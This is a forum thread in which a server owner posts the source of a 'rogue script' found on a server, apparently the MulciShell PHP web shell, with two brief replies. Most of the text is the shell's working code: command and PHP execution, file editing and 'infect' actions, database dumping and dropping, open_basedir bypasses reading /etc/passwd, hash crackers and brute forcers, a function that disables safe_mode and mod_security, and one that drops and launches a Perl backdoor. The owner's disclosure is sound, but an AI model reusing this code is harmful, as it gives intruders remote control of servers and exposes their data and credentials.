@$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; @$size=TrueSize(filesize($d.'/'.$f)); @$ch=substr(base_convert(fileperms($d.'/'.$f),10,,3); @$write=is_writable($d.'/'.$f)?"Yes":"No"; @$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); echo "<tr><td><a href='$self?act=f&file=$d/$f'>$f</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>"; } echo "</table> <input type='button' style='background-color: none; border: 1px solid white;' value='Toggle' onClick='togglecheck()'></br> With checked file(s): <select name='fileaction'> <option name='chmod'>Chmod</option> <option name='delete'>Delete</option> <option name='infect'>Infect</option><input type='text' value='chmod value' name='cmodv'> </select> <br><input type='submit' value='Go' name='massfiles'></form>"; Quote Link to comment https://forums.phpfreaks.com/topic/195226-found-this-rogue-script-on-one-of-my-servers/ Share on other sites More sharing options...
krispykreme Posted March 14, 2010 Author Share Posted March 14, 2010 part 2 of the same script (file was too large) function SQLLogin() { global $self; if(!isset($_SESSION['log'])&&!isset($_POST['mconnect'])) { echo "<center><form action='$self?act=sql' method='post'> Host: <input type='text' value='localhost' name='mhost'> Username: <input type='text' value='root' name='muser'> Password: <input type='password' value='' name='mpass'> Port: <input type='text' style='width: 40px' value='3306' name='mport'> <input type='submit' value='Connect' name='mconnect'> </form> </center>"; } elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect'])) { extract($_POST); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { $_SESSION['muser']=$muser; $_SESSION['mhost']=$mhost; $_SESSION['mpass']=$mpass; $_SESSION['mport']=$mport; $_SESSION['log']=true; header("Location: $self?act=sqledit"); } else echo "Failed to login with $muser@$mhost!<br>"; } else { header("Location: $self?act=sqledit"); } } function SQLEditor() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { echo "Logged in as $muser@$mhost <a href='$self?act=logout'>[Logout]</a><center>"; echo "<form method='POST' action='$self?'> Quick SQL query: <input type='text' style='width: 300px' value='select * from users' name='sqlquery'> <input type='hidden' name='db' value='$_GET[db]'> <input type='submit' value='Go' name='sql'> </form>"; echo "<form action='$self?act=sqledit' method='post'> <input type='submit' style='border: none;' value='[ List Processes ]' name='sql_list_proc'> </form></center></br></br>"; if(isset($_POST['sql_list_proc'])) { $res=mysql_list_processes(); echo "<table style='margin: auto; text-align: center;'><tr> <td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time</td> </tr>"; while($r=mysql_fetch_assoc($res)) echo "<tr><td>$r[id]</td><td>$r[Host]</td><td>$r[db]</td><td>$r[Command]</td><td>$r[Time]</td></tr>"; mysql_free_result($res); echo "</table></br>"; } if(!isset($_GET['db'])) { if(isset($_POST['dbc'])) db_create(); if(isset($_GET['dropdb'])) SQLDrop(); echo "<table style='margin: auto; text-align: center;'> <tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</td></tr>"; $all_your_base=mysql_list_dbs($conn); while($your_base=mysql_fetch_assoc($all_your_base)) { $tbl=mysql_query("SHOW TABLES FROM $your_base[Database]"); $tbl_count=mysql_num_rows($tbl); echo "<tr><td><a href='$self?act=sqledit&db=$your_base[Database]'>$your_base[Database]</td><td>$tbl_count</td><td><a href='$self?act=download&db=$your_base[Database]'>Download</a></td><td><a href='$self?act=sqledit&dropdb=$your_base[Database]'>Drop</a></td></tr>"; } echo "</table></br><center><form action='$self?act=sqledit' method='post'>New database name: <input type='text' value='new_database' name='db_name'><input type='submit' style='border: none;' value='[ Create Database ]' name='dbc'></form></center></br>"; } elseif(isset($_GET['db'])&&!isset($_GET['tbl'])) { if(isset($_POST['tblc'])) table_create(); if(isset($_GET['droptbl'])) SQLDrop(); echo "<table style='margin: auto; text-align: center;'> <tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></tr>"; $tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($tblc=mysql_fetch_array($tables)) { $fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]"); $fc=mysql_num_rows($fCount); echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$tblc[0]'>$tblc[0]</a></td><td>$fc</td><td><a href='$self?act=download&db=$_GET[db]&tbl=$tblc[0]'>Dump</td><td><a href='$self?act=sqledit&db=$_GET[db]&droptbl=$tblc[0]'>Drop</a></td></tr>"; } echo "</table></br><center><form action='$self?act=sqledit&db=$_GET[db]' method='post'>Create new table: <input type='text' value='new_table' name='table_name'><input type='hidden' value='$_GET[db]' name='db_current'> <input type='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></center>"; } elseif(isset($_GET['field'])&&isset($_POST['sqlsave'])) { $discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $values=mysql_fetch_assoc($discard_values); $keys=array_keys($values); $values=array(); foreach($_POST as $k=>$v) if(in_array($k,$keys)) $values[]=$v; $query="UPDATE $_GET[db].$_GET[tbl] SET "; for($y=0;$y<count($values);$y++) { if($y==count($values)-1) $query.="$keys[$y]='$values[$y]' "; else $query.="$keys[$y]='$values[$y]', "; } $query.="WHERE $_GET[field] = '$_GET[v]'"; $try=mysql_query($query) or die(mysql_error()); echo "<center>Table updated!<br>"; echo "<a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]'>Go back</a><br><br>"; } elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del'])) { echo "<center><form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$_GET[field]&v=$_GET[v]' method='post'>"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['Field']; $data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $d_piece=mysql_fetch_assoc($data); for($m=0;$m<count($sql_fields);$m++) { $point=$sql_fields[$m]; echo "$point: <input type='text' value='$d_piece[$point]' name='$sql_fields[$m]'></br>"; } echo "<input type='submit' value='Save' name='sqlsave'></form></center>"; } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { if(isset($_GET['insert'])) SQLInsert(); if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del'])) { echo "<center>"; if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted</br>"; else echo "Failed to delete row</br>"; echo "</center>"; } echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1'>[insert new row]</a></center>"; echo "<table style='margin: auto; text-align: center;'><tr>"; $cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); $fields=array(); while($col=mysql_fetch_assoc($cols)) { array_push($fields,$col['Field']); echo "<td>$col[Field]</td>"; } echo "</tr>"; if(isset($_GET['s'])&&is_numeric($_GET['s'])) {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");} else {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");} while($select=mysql_fetch_row($selector)) { echo "<tr>"; for($i=0;$i<count($fields);$i++) { echo "<td>".htmlspecialchars($select[$i])."</td>"; } echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]'>Edit</a></td><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]&del=true'>Delete</a></td>"; echo "</tr>"; } echo "</table>"; echo "<table style='margin: auto;'>"; if(isset($_GET['s'])) { $prev=intval($_GET['s'])-250; $next=intval($_GET['s'])+250; if($_GET['s']>0) echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$prev'>Previous</a></td>"; if(mysql_num_rows($selector)>249) echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$next'>Next</a></td></tr>"; } else echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=250'>Next</a></center>"; echo "</table>"; } else { $_SESSION=array(); session_destroy(); header("Location: $self?act=sql"); } } } function SQLDownload() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_GET['db'])&&!isset($_GET['tbl'])) { $tables=array(); $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################\n\n"; $get_tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($current_table=mysql_fetch_array($get_tables)) $tables[]=$current_table[0]; foreach($tables as $table_dump) { $data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump"); while($current_data=mysql_fetch_assoc($data_selection)) { $fields=implode("`, `", array_keys($current_data)); $values=implode("`, `",array_values($current_data)); $dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); "; } } } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################\n"; $table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]"); while($table_data=mysql_fetch_assoc($table_dump)) { $fields=implode("`, `",array_keys($table_data)); $values=implode("`, `",array_values($table_data)); $dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n"; } } else { echo "Invalid!"; } } $dump_file.="########################################################################################"; if(!isset($_GET['tbl'])) $file_name="$_GET[db]"."_DUMP.sql"; else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql"; ob_get_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($dump_file)); header("Content-disposition: attachment; filename=$file_name;"); echo $dump_file; exit; } function SqlInsert() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_POST['sql_insert'])) { echo "<form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1' method='post'><center>"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; for($s=0;$s<count($sql_fields);$s++) echo "$sql_fields[$s]: <input type='text' name='$sql_fields[$s]'></br>"; echo "<input type='submit' value='Insert' name='sql_insert'></center></form>"; } else { $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; $values=array(); $keys=array(); $query="INSERT INTO $_GET[db].$_GET[tbl] ("; foreach($_POST as $k=>$v) { if(in_array($k,$sql_fields)&&!empty($v)) { $values[]=$v; $keys[]=$k; } } for($k=0;$k<count($keys);$k++) { if($k==count($keys)-1) $query.="`$keys[$k]`"; else $query.="`$keys[$k]`,"; } $query.=") VALUES ("; for($v=0;$v<count($values);$v++) { if($v==count($values)-1) $query.="'$values[$v]'"; else $query.="'$values[$v]',"; } $query.=")"; echo "<center>"; if(@mysql_query($query)) echo "Row inserted</br>"; else echo "Failed to insert row</br>"; echo "</center>"; } } } function SQLDrop() { echo "<center>"; extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_GET['droptbl'])) { $query="DROP DATABASE $_GET[dropdb]"; if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped<br>"; else echo "Failed to drop database $_GET[dropdb]<br>"; } elseif(isset($_GET['db'])&&isset($_GET['droptbl'])) { $query="DELETE FROM $_GET[db].$_GET[droptbl]"; if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped<br>"; else echo "Failed to drop table $_GET[droptbl]<br>"; } else { echo "Invalid request<br>"; } } else echo "Failed to connect<br>"; echo "</center>"; } function db_create() { echo "<center>"; if(isset($_POST['db_name']) && !empty($_POST['db_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!"; else echo "Failed to create database $_POST[db_name]</br>"; } else echo "Failed to connect</br>"; } else echo "Enter a DB name</br>"; echo "</cenetr>"; } function table_create() { echo "<center>"; if(isset($_POST['table_name'])&&!empty($_POST['table_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { @mysql_select_db($_POST['db_current']); if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!"; else echo "Failed to create table $_POST[table_name]"; } else echo "Failed to connect!</br>"; } else echo "Enter a table name</br>"; echo "</center>"; } function FileEditor() { if(isset($_GET['file'])) $file=$_GET['file']; elseif(isset($_POST['nfile'])) $file=$_POST['nfile']; elseif(isset($_POST['editfile'])) $file=$_POST['editfile']; if(@!file_exists($file)) die("Permission denied!"); if(isset($_POST['dfile'])) { @$fh=fopen($file,'r'); @$buffer=fread($fh,filesize($file)); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($buffer)); header("Content-disposition: attachment; filename=".basename($file).';'); @ob_get_clean(); echo $buffer; @fclose($fh); } elseif(isset($_POST['delfile'])) { if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!<br>"; else echo "File deleted<br>"; } elseif(isset($_POST['sfile'])) { $fh=@fopen($file,'w') or die("Failed to open file for editing!"); @fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents'])); echo "File saved!"; @fclose($fh); } else { $fh=@fopen($file,'r'); echo "<center> <form action='$self?act=f' method='post'> File to edit: <input type='text' style='width: 300px' value='$file' name='nfile'> <input type='submit' value='Go' name='gfile'></br></br>"; echo "<textarea rows='20' cols='150' name='file_contents'>".htmlspecialchars(@fread($fh,filesize($file)))."</textarea></br></br>"; echo "<input type='submit' value='Save file' name='sfile'> <input type='submit' value='Download file' name='dfile'> <input type='submit' value='Delete file' name='delfile'> </center></form>"; @fclose($fh); } } function security_bypass() { if(isset($_POST['curl_bypass'])) { $ch=curl_init("file://$_POST[file_bypass]"); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars($file_out)."</textarea></br></br>"; } elseif(isset($_POST['tmp_bypass'])) { tempnam("/home/",$_POST['file_passwd']); } elseif(isset($_POST['copy_bypass'])) { if(@copy($_POST['file_bypass'],$_POST['dest'])) { echo "File successfully copied!</br>"; @$fh=fopen($_POST['dest'],'r'); echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."</textarea></br></br>"; @fclose($fh); } else echo "Failed to copy file</br>"; } elseif(isset($_POST['include_bypass'])) { if(file_exists($_POST['file_bypass'])) { echo "<textarea rows='20' cols='150' readonly>"; @include($_POST['file_bypass']); echo "</textarea>"; } } elseif(isset($_POST['sql_bypass'])) { extract($_SESSION); $conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { mysql_select_db($_POST['sql_db']); mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);"); mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error()); $res=mysql_query("SELECT * FROM $_POST[tmp_table]"); if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!"); if($res) { while($row=mysql_fetch_array($res)) $f.="$row[0]</br>"; echo $f; } mysql_query("DROP TABLE $_POST[tmp_table]"); } } echo "<table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Security (open_basedir) bypassers</td></tr> <tr><td>Bypass using cURL</td><td>Bypass using tempnam()</td></tr> <tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Read file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='curl_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Write file: <input type='text' value='../../../etc/passwd' name='file_bypass'><input type='submit' name='tmp_bypass' value='Bypass'></form></td></tr> <tr><td>Bypass using copy()</td><td>Bypass using include()</td></tr> <tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Copy to: <input type='text' style='width: 250px;' name='dest' value='".CleanDir(getcwd())."/copy.php'></br> File to copy: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='copy_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Path to file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='include_bypass' value='Bypass'></form></td></tr> <tr><td colspan='2'>Bypass using SQL LOAD INFILE [Login to SQL server first]</td></tr> <tr><td colspan='2'><form action='$self?act=bypass' method='post' name='bypasser'>[Existing] Database to store temporary table: <input type='text' value='tmp_database' name='sql_db'></br>Temporary table: <input type='text' value='tmp_file' name='tmp_table'></br><input type='text' value='/etc/passwd' name='sql_file'><input type='submit' name='sql_bypass' value='Bypass'></form></td></tr> </table>"; } function brute_force() { echo "<form action='$self' method='post' enctype='multipart/form-data'><input type='hidden' name='docrack'><table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Password crackers</td></tr> <tr><td>MD5 Cracker</td><td>SHA1 Cracker</td></tr> <tr><td>Hash: <input type='text' name='md5hash'><input type='submit' value='Crack' name='md5crack'></td><td>Hash: <input type='text' name='sha1hash'><input type='submit' value='Crack' name='sha1crack'></td></tr> <tr><td>VBulletin Salt Cracker</td><td>SMF Salt cracker</td></tr> <tr><td>Hash: <input type='text' name='vbhash'></br>Salt: <input type='text' name='vbsalt' salt='#7A'></br><input type='submit' value='Crack' name='vbcrack'></td><td>Hash: <input type='text' name='smfhash'></br>Salt: <input type='text' name='smfsalt'></br><input type='submit' value='Crack' name='smfcrack'></td></tr> <tr><td>MySQL Brute Force</td><td>FTP Brute Force</td></tr> <tr><td>User: <input type='text' value='root' name='mysql_user'></br>Host: <input type='text' value='localhost' name='mysql_host'></br>Port: <input type='text' value='3306' name='mysql_port'></br><input type='submit' value='Brute' name='mysqlcrack'></td><td>User: <input type='text' value='root' name='ftp_user'></br>Host: <input type='text' value='localhost' name='ftp_host'></br>Port: <input type='text' value='21' name='ftp_port'></br>Timeout: <input type='text' value='5' name='ftp_timeout'></br><input type='submit' value='Brute' name='ftpcrack'></td></tr> <tr><td>Remote login Brute Force</td><td>HTTP-Auth Brute Force</td></tr> <tr><td>Login form: <input type='text' value='' name='remote_login_target'></br>Username: <input type='text' value='admin' name='remote_login_user'><input type='submit' value='Brute' name='remote_login'></td><td>Username: <input type='text' name='auth_user' value='porn_user101'></br>Auth URL: <input type='text' name='auth_url'><input type='submit' value='Brute' name='authcrack'></td></tr> <tr><td colspan='2'>Wordlist</td></tr> <tr><td colspan='2'><input type='file' name='wordlist'></br></br><b>Notice: Be sure to check the max POST length allowed</b></td></tr> </br></table></form>"; } function BackDoor() { global $backdoor_perl; global $disable; if(!isset($_POST['backdoor_host'])) { echo "<center><form action='$self?act=bh' method='post'> Port: <input type='text' name='port'> <input type='submit' name='backdoor_host' value='Backdoor'></center>"; } else { @$fh=fopen("shbd.pl","w"); @fwrite($fh,base64_decode($backdoor_perl)); @fclose($fh); execmd("perl shbd.pl $_POST[port]",$disable); echo "Server backdoor'd</br>"; } } function disable_sec() { @$ini=fopen("php.ini","w "); @fwrite($ini,"disable_functions= open_basedir=Off safe_mode=Off safe_mode_gid=Off remote_includes=On "); @$hta = fopen(".htaccess","w "); @fwrite($hta,"<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckUnicodeEncoding Off </IfModule>"); @fclose($ini); @fclose($hta); } function sql_rep_search($dir) { global $self; $ext=array(".db",".sql"); @$dh=opendir($dir); while((@$file=readdir($dh))) { $ex=strrchr($file,'.'); if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db") echo "<tr><td><center><a href='$self?act=f&file=$dir"."$file'>$dir"."$file</center></td></tr>"; if(is_dir($dir.$file)&&$file!='..'&&$file!='.') { if(!preg_match("/\/public_html\//",$dir)) sql_rep_search($dir.$file.'/public_html/'); else sql_rep_search($dir.$file); } } @closedir($dh); } function database_tools() { if(isset($_POST['sql_start_search'])) { echo "<center><table style='width: auto;'><tr><td><center><font color='#FF0000'>Databases</font></center></td></tr>"; sql_rep_search("/home/"); echo "</table></center>"; } $colarr=array(); if(isset($_POST['db_parse'])) { if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse..."); $db_meth=empty($_POST['db_dpath'])?'uploaded':'path'; $q_delimit=$_POST['q_delimit']; if(isset($_POST['column_defined'])) { switch($_POST['column_type']) { case 'SMF': break; case 'phpbb': break; case 'vbulletin': $colarr=array(4,5,7,48); break; } } else { $strr=str_replace(", ",",",trim($_POST['db_columns'])); $colarr=explode(",",$strr); } switch($db_meth) { case 'uploaded': @$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading"); break; case 'path': @$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading"); break; } echo "Parsing database contents...</br>"; while(!feof($fh)) { $c_line=fgets($fh); $strr=str_replace(", ",",",$c_line); $arr=explode(',',$strr); for($i=0;$i<count($colarr);$i++) { $index=$colarr[$i]; if(empty($arr[$index])) continue; $spos=strpos("$_POST[q_delimit]",$arr[$index]); $spos=strpos("$_POST[q_delimit]",$arr[$index],$spos); if($i!==count($colarr)-1) echo "$arr[$index] : "; else echo "$arr[$index]</br>"; } continue; } @fclose($fh); } echo "<table style='width: 100%; margin: auto; text-align: center'> <tr><td colspan='2'>Database parser</td></tr> <tr><td> <form action='$self?act=dbs' method='post' enctype='multipart/form-data'> Quote delimiter (usually ` or '): <input type='text' style='width: 20px' name='q_delimit' value='`'> Columns to retrieve (separate by commas): <input type='text' style='width: 200px' name='db_columns' value='3,5,10'></br> Use predefined column match (user+pass+salt): <input type='checkbox' name='column_defined'> <select name='column_type'> <option value='vbulletin'>VBulletin</option><option value='SMF'>SMF</option><option value='phpbb'>PHPBB</option> </select></br> Path to DB dump: <input type='text' style='width: 300px' value='/home/someuser/public_html/backup.db' name='db_dpath'> </br>Upload DB dump: <input type='file' style='width: 300px' value='' name='db_upath'> </br></br><input type='submit' style='width: 300px' value='Parse Database' name='db_parse'></td></tr> <tr><td colspan='2'>Find database Backups</td></tr> <tr><td>Only search within local path: <input type='checkbox' name='sql_search_local'> <input type='submit' value='Go' name='sql_start_search'></br></td></tr> </table>"; } function show_tools() { echo "<form action='$self' method='post'> <table style='width: 100%; margin: auto; text-align: center'> <tr><td colspan='2'>Tools</td></tr> <tr><td>Forum locator</td><td>Config locator</td></tr> <tr><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_forums'></form></td><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_configs'></form></td></tr> <tr><td>Port scanner</td><td>Search</td></tr> <tr><td><form action='$self' method='post'>Host: Start port: <input type='text' value='localhost' name='host'></br>Start port: <input type='text' value='80' style='width: 50px' name='sport'> End Port: <input type'text' style='width: 50px' value='1000' name='eport'></br><input type='submit' value='Scan' name='port_scan'>Using: <select name='type'><option value='php'>PHP</option><option value='perl'>Perl</option></select></form></td><td>Finish this next</td></tr> </table>"; } function TrueSize($s) { if(!$s) return 0; if($s>=1073741824) return(round($s/1073741824)." GB"); elseif($s>=1048576) return(round($s/1048576)." MB"); elseif($s>=1024) return(round($s/1024)." KB"); else return($s." B"); } function CleanDir($d) { $d=str_replace("\\","/",$d); $d=str_replace("//","/",$d); return $d; } function Trail($d) { $d=explode('/',$d); array_pop($d); array_pop($d); $str=implode($d,'/'); return $str; } function Encoder() { echo "<form action='$self?' method='post'> <center> Input: <input type='text' style='width: 300px' name='encrypt'> <br><input type='submit' value='Encrypt' name='encryption'> </center> </form>"; } $relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd())); if(isset($_GET['d'])) $self.="?d=$_GET[d]"; echo "<table style='text-align: center; width: 100%'> <tr><td colspan='2'>Execute command</td></tr> <tr><td colspan='2'><form action='$self?' method='post'><input type='text' style='width: 600px' value='whoami' name='cmd'><input type='submit' name='execmd' value='Execute'></form></td></tr> <tr><td colspan='2'>Execute PHP</td></tr> <tr><td colspan='2'><form action='$self' method='post'><textarea rows='2' cols='80' name='phpcode' style='background-color: black;'>//Don't include PHP tags</textarea><input type='submit' name='execphp' value='Execute'></form></td></tr> <tr><td>Create directory</td><td>Create file</td></tr> <tr><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/sikreet/' name='newdir'><input type='submit' value='Create' name='cnewdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/index2.php' name='newfile'><input type='submit' value='Create' name='cnewfile'></form></td></tr> <tr><td>Enter directory</td><td>Edit file</td></tr> <tr><td><form action='$self' method='post'><input type='text' style='width: 225px' name='godir'><input type='submit' value='Go' name='enterdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='/etc/passwd' name='editfile'><input type='submit' name='doeditfile' value='Go'></form></td></tr> <tr><td>Upload file</td><td>Wget file</td></tr> <tr><td><form action='$self' method='post' enctype='multipart/form-data'>Save location: <input type='text' style='width: 300px' value='$relpath' name='u_location'></br><input type='file' name='u_file'><input type='submit' value='Upload' name='doUpload'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='http://www.site.com/image1.jpg' name='wgetfile'><input type='submit' name='dogetfile' value='Go'></form</td></tr> <tr><td colspan='2'>Switch theme: <a href='$self?theme=green'>Matrix Green</a>, <a href='$self?theme=uplink'>Uplink Blue</a>, <a href='$self?theme=dark'>Dark</a></td></tr> </table> </br></br><div id='bar'><center>Shell [version 2.0] created by <font color='red'><b>[MulCiber]</font> | Page generated in : <font color='red'>".round(microtime()-$start,2)." seconds</font><br><font color=red><b>Uploaded By VLinhT </b></font></center></div></body></html>"; ob_end_flush(); ?> Quote Link to comment https://forums.phpfreaks.com/topic/195226-found-this-rogue-script-on-one-of-my-servers/#findComment-1026035 Share on other sites More sharing options...
jopperdepopper Posted March 16, 2010 Share Posted March 16, 2010 Smells like bad news to me. http://www.google.com/search?q=MulCiShell&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:nl:official&client=firefox-a Quote Link to comment https://forums.phpfreaks.com/topic/195226-found-this-rogue-script-on-one-of-my-servers/#findComment-1026853 Share on other sites More sharing options...
2levelsabove Posted March 22, 2010 Share Posted March 22, 2010 There are some serious A-Holes out there! Quote Link to comment https://forums.phpfreaks.com/topic/195226-found-this-rogue-script-on-one-of-my-servers/#findComment-1030003 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.